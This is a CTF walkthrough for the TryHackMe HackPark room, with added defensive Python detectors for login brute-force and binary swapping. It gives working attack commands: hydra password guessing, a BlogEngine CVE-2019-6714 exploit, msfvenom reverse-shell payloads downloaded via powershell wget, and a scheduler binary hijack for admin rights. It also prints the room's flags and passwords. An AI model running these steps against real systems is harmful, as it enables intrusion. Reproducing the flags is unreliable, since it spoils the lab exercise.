THM HackPark - grunt92/IT-Sec-WriteUps GitHub Wiki
No answer needed
Pennywise
Use the Network tab of the developer tools on your device, go to the login page and try to log in to the site. In the Network tab you find the attempted login including the request type.
POST
Use the Network tab of the developer tools again. Send a login request and copy the request in its raw form. Replace the username with "admin" and the password with "^PASS^" (this becomes the `Request` part of the hydra form string). Now run `hydra -t 64 -l admin -P /Path/to/wordlists IP http-post-form "/Account/login.aspx?ReturnURL=/admin/:Request:Login failed"` and you get the password.
1qaz2wsx
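From the defender's side, the hydra run above leaves a very recognisable trace: a burst of POST requests to `/Account/login.aspx` from one client in a short time. The following is an added example (not part of the writeup or of BlogEngine) that reads IIS W3C log text, counts login POSTs per client IP inside a sliding window and flags IPs that exceed a threshold. The log lines, IPs and timestamps are constructed for the example.

```python
"""Detect a login brute-force against the BlogEngine login form from IIS W3C logs.
Counts POST requests to the login page per client IP inside a sliding time window
and reports IPs whose peak count reaches a threshold.  All log data below is
constructed for this example, not real server output."""
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/Account/login.aspx"

# Constructed IIS W3C log: a normal user (10.10.14.9) logs in once, then a
# burst of 20 login POSTs within 20 seconds arrives from 10.10.14.2.
_HEADER = (
    "#Software: Microsoft Internet Information Services 8.5\n"
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status time-taken\n"
)
_BENIGN = (
    "2019-08-03 10:40:00 10.10.10.5 GET /Account/login.aspx ReturnURL=/admin/ 80 - 10.10.14.9 Mozilla/5.0 200 15\n"
    "2019-08-03 10:40:05 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin/ 80 - 10.10.14.9 Mozilla/5.0 302 40\n"
    "2019-08-03 10:40:06 10.10.10.5 GET /admin/ - 80 admin 10.10.14.9 Mozilla/5.0 200 120\n"
)
_BURST = "".join(
    f"2019-08-03 10:41:{i:02d} 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin/ 80 - 10.10.14.2 Mozilla/5.0 200 31\n"
    for i in range(20)
)
SAMPLE_LOG = _HEADER + _BENIGN + _BURST


def parse_iis_w3c(text):
    """Yield one dict per data line, keyed by the column names from the #Fields line."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue  # other directives (#Software, #Date, ...) carry no records
        parts = raw.split()
        if fields is None or len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def login_bursts(text, login_path=LOGIN_PATH, threshold=10, window_seconds=60):
    """Return {client_ip: peak_count} for IPs whose login POSTs within any
    window_seconds-long window reach the threshold."""
    windows = defaultdict(deque)   # per-IP timestamps of recent login POSTs
    peak = defaultdict(int)        # per-IP highest count seen in one window
    for rec in parse_iis_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != login_path.lower():
            continue
        ts = datetime.strptime(f'{rec["date"]} {rec["time"]}', "%Y-%m-%d %H:%M:%S")
        q = windows[rec["c-ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()            # drop timestamps that fell out of the window
        peak[rec["c-ip"]] = max(peak[rec["c-ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    print(login_bursts(SAMPLE_LOG))  # {'10.10.14.2': 20}
```

The check is deliberately independent of the User-Agent, which a tool can set to anything; request rate to the login endpoint is the signal. In production the same logic would run over the live log directory and feed an alert or a temporary block on the client IP.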
No answer needed
Navigate to "IP/admin/about.cshtml" and you get the answer.
3.3.6.0
Go to https://www.exploit-db.com/ and search for "BlogEngine". Select the exploit for the correct version that is marked as verified.
CVE-2019-6714
Download the found exploit and follow the given instructions. After the reverse shell is established, run `whoami` to get the desired information.
iis apppool\blog
THM gives us the tip to generate a reverse shell, upload it and execute it manually. To do so, run `msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=YOUR_IP LPORT=YOUR_PORT -f exe -o shell.exe` on your device. In the same directory run `python3 -m http.server PORT` to start a web server. On the target device run `powershell -c wget "http://IP:PORT/shell.exe" -outfile "shell.exe"`. On your device start Metasploit by running `msfconsole`. Enter `use exploit/multi/handler` and `set payload windows/meterpreter/reverse_tcp`, set the options to the specifics of your device and start the handler. On the target device start the shell by entering `shell.exe` and a meterpreter reverse shell should be established.
No answer needed
Run `sysinfo`.
Windows 2012 R2 (6.3 Build 9600).
Get a winPEAS.exe, upload it to the target and run it using the initial shell. Among the running processes one process is marked by winPEAS: "WScheduler.exe"; the "W" stands for "Windows".
WindowsScheduler
In the winPEAS results check the section "Services Information - Interesting Services". Two of the services stand out. Running searchsploit on these services shows that there is information for the Windows Scheduler. In the reverse shell move into "C:\Program Files (x86)\SystemScheduler\Events", check the text file in that directory and you will see that the event started was "Message.exe".
Message.exe
Stop the meterpreter shell. In the initial reverse shell move to "C:\Program Files (x86)\SystemScheduler" and rename "message.exe" by running `rename "message.exe" "message.bak"`, then download the meterpreter shell by running `powershell -c wget "http://IP:PORT/shell.exe" -outfile "message.exe"`. Start the meterpreter handler again and you get a new shell, now as the administrator.
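The privilege escalation above works because a scheduler running as an administrator executes a binary from a directory that a low-privileged account can write to. The usual defensive control is to keep that directory unwritable and to watch the scheduled binaries for changes. The following is an added example (not part of the writeup or of the scheduler product) of a small file-integrity check: it baselines SHA-256 hashes of every file under a directory, re-hashes later and reports what was added or changed. `simulate_hijack` builds a constructed directory tree in a temp folder, performs the same rename-and-replace the walkthrough describes, and returns the diff; the file names and contents are constructed, and the Events log name is a placeholder.

```python
"""File-integrity check for a directory of scheduler-launched executables.
Baseline the SHA-256 of each file, re-check later, and flag executables that
changed or appeared.  The directory tree built by simulate_hijack() is
constructed for this example and does not reproduce the real product's files."""
import hashlib
import os
import tempfile

EXECUTABLE_SUFFIXES = (".exe", ".bat", ".cmd", ".ps1", ".vbs", ".dll")


def sha256_of(path):
    """Stream the file through SHA-256 so large binaries do not land in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(directory):
    """Map every file under `directory` (path relative to it, '/'-separated) to its hash."""
    result = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, directory).replace(os.sep, "/")
            result[rel] = sha256_of(full)
    return result


def diff_baseline(old, new):
    """Classify changes between two baselines.  'suspicious' lists executables
    that were added or whose content changed; a swapped scheduled binary lands there."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in old.keys() & new.keys() if old[p] != new[p])
    suspicious = sorted(p for p in added + changed
                        if p.lower().endswith(EXECUTABLE_SUFFIXES))
    return {"added": added, "removed": removed, "changed": changed, "suspicious": suspicious}


def simulate_hijack():
    """Build a constructed scheduler-like tree, baseline it, apply the rename-and-
    replace described in the walkthrough, and return the resulting diff."""
    with tempfile.TemporaryDirectory() as tmp:
        events = os.path.join(tmp, "Events")
        os.makedirs(events)
        exe = os.path.join(tmp, "Message.exe")
        with open(exe, "wb") as f:
            f.write(b"MZ original vendor binary (constructed)")
        # Placeholder name for the event log the walkthrough reads in Events\.
        with open(os.path.join(events, "constructed_event_log.txt"), "w") as f:
            f.write("Event started: Message.exe\n")
        before = baseline(tmp)

        # The change the walkthrough makes: original renamed, new binary dropped.
        os.rename(exe, os.path.join(tmp, "Message.bak"))
        with open(exe, "wb") as f:
            f.write(b"MZ replacement binary (constructed)")
        after = baseline(tmp)
        return diff_baseline(before, after)


if __name__ == "__main__":
    print(simulate_hijack())
```

The expected report is `changed == ["Message.exe"]`, `added == ["Message.bak"]` and `suspicious == ["Message.exe"]`. Hash comparison catches the swap even when the new file keeps the original name, size and timestamp; the stray `.bak` sibling is a second, cheaper indicator worth alerting on in a directory that should only ever change during vendor updates.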
Change the directory to "C:\Users\jeff\Desktop" and run `cat user.txt` to get the flag.
759bd8af507517bcfaede78a21a73e39
Move the shell to "C:\Users\Administrator\Desktop" and run `cat root.txt` to get the final flag.
7e13d97f05f7ceb9881a3eb3d78d3e72
Now we can generate a more stable shell using msfvenom instead of a meterpreter. This time set the payload to windows/shell_reverse_tcp.
No answer needed
No answer needed
Instead of using winPEAS, just run `systeminfo`.
8/3/2019, 10:43:23 AM